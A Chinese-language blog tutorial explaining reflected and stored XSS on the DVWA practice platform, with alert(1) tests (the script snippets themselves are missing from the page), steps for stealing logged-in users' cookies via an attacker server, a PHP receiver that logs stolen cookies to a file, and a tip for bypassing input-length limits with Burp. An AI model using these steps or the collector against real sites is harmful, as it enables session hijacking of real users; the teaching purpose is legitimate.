浅析XSS漏洞及基础攻击方法

1,intr()

2,基本介绍

3,使用扩展

 

 

 

感觉大部分的web漏洞都大同小异,XSS也不例外;区别于SQL注入时基于后台服务器数据库的漏洞注入,XSS则是基于web前端的漏洞,通过前端开发者所遗留地点进行web行为的注入,让网页执行意料之外的结果,从而达到攻击者的目的。大都是以窃取cookie提权为目的的攻击

 

百度百科:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。

 

 

常见的XSS漏洞分为反射型和存储型

反射型:言简意赅就是输入等于输出的内容,像一面镜子一样直接反射在网页上面,从而攻击者可以在返回网页的源代码中查看到自己刚才所输入的内容,稍加修饰,即可将无害的数据变为恶意程序(大多为恶意链接)窃取到当前以登录用户的cookie信息

存储型:大多存在于论坛评论区,在网页前端输入内容将长久存放于网页数据库内,原理大抵等同于反射型XSS,只是危害更大

 

以著名的靶机平台DVWA为例(登录进该靶机平台都需要实现登录,实验过程中浏览器的每一次操作必定带有登录信息的cookie,模拟现实环境即某论坛用户登陆过后在以登录状态下的各种操作)

浅析XSS漏洞及基础攻击方法_第1张图片

上面是反射型漏洞,下面的则是存储型漏洞

 

首先是反射型漏洞:

浅析XSS漏洞及基础攻击方法_第2张图片

很明显,我在input框中所输入的直接被“倒映”在了下面的输出内容,按f12查看源码,输出内容如下:

浅析XSS漏洞及基础攻击方法_第3张图片

输入数据以HTML的

标签形式被输出,w3cschool中对此标签描述如下:

说白了就是一个简单的输出内容

我们仔细研究源代码后,可以通过修改输入内容,即为在输入内容中添加恶意web行为,导致网页在运作中意外执行了此恶意行为,以达到攻击者的目的

粘几个常用的恶意web行为脚本代码:(作用均为恶意弹窗显示为“1”)

           //后两个适用于网页已经把即可完成XSS漏洞的利用,大同小异:

浅析XSS漏洞及基础攻击方法_第7张图片浅析XSS漏洞及基础攻击方法_第8张图片

一样的

 

 

 

XSS漏洞绝对不是给你做恶作剧无聊弹窗用的,以上的alert(1)仅仅是测试是否存在测试之用

 

浅析XSS漏洞及基础攻击方法_第9张图片

用于盗用以登录用户的cookie:

1.首先我们需要准备一个公网ip的服务器,以接收我们已盗用的cookie数据

2.发掘XSS漏洞,并将漏洞处的url准备为一个链接(反射型);评论区植入漏洞代码即可(存储型漏洞)

3.准备恶意木马存放于之前已准备好的服务器上

 

恶意植入的代码(127.0.0.1替换为你已经准备的公网服务器ip地址,而且需要提前配置好http服务,于/var/www/文件下即可)

 

恶意代码,存放于公网服务器下,上面脚本只要被运行则会出发该程序启动,记录的用户cookie信息则会自动存放至目录下的cookie.txt文档

$cookie = $_GET['cookie'];         //获取cookie变量值

$log = fopen("cookie.txt","w");   //创建或打开某文档

fwrite($log,$cookie ."\n");         // 写入被赋值的cookie变量

fclose($log);                            // 关闭文本

echo"攻击成功";                     //给出php被执行反馈

?>

 

瞅一眼我们已经获取到的cookie:

浅析XSS漏洞及基础攻击方法_第10张图片

浅析XSS漏洞及基础攻击方法_第11张图片

即可

----存储型XSS漏洞只要是用户进入的网页存在这一条恶意脚本,则会自动触发机制,cookie信息就已经传送给了后台的服务器上

----反射型XSS漏洞通常是做好一整套的恶意链接,然后攻破网站后再网站的空白处放置空白图片,包含恶意代码只要点开cookie就立马白给

PS:许多网页前端input框添加了代码长度限制,通过brup转发挂包即可绕过前端,一样的,大都大同小异,没什么区别

这也是现在许多的私人论坛上的评论区必须要进过管理员审核才能将评论发布出来的原因之一

 

你可能感兴趣的:(漏洞分析)